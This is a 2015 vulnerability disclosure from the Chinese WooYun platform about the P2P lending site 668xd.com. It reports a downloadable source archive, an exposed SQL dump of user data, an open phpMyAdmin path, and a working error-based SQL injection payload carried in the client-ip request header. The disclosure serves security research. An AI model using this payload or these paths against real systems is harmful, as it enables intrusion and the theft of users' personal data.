当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151091

漏洞标题:p2p安全之668钱贷网运维不当大量敏感信息泄露/SQL注入

相关厂商:668钱贷网

漏洞作者: whynot

提交时间:2015-11-01 22:06

修复时间:2015-12-16 22:08

公开时间:2015-12-16 22:08

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

敏感信息泄露咯 亲

详细说明:

网站地址 http://www.668xd.com/

11111111111111.png


http://www.668xd.com/668xd.zip 即可下载中源码文件
几百M下载 下来以后 源码 备份文件等等

222222222222222.png


访问668xd.sql 即可看到
用户资料

33333333333333.png


mysql配置文件

44444444444444.png


进入phpmyadmin http://www.668xd.com/cssksoft_phpmyadmin/index.php

5555555555555555.png


漏洞证明:

3.png


GET / HTTP/1.1
Host: www.668xd.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CNZZDATA4217711=cnzz_eid%3D287649039-1446366892-%26ntime%3D1448076010; PHPSESSID=f49e31a0543c818ec3f94fd09c15ed63
client-ip: ' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#
Connection: keep-alive
Cache-Control: max-age=0


4.png


5.png

修复方案:

运维小心点吧。。 拜托wooyun大哥打码 能走大厂商不

版权声明:转载请注明来源 whynot@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝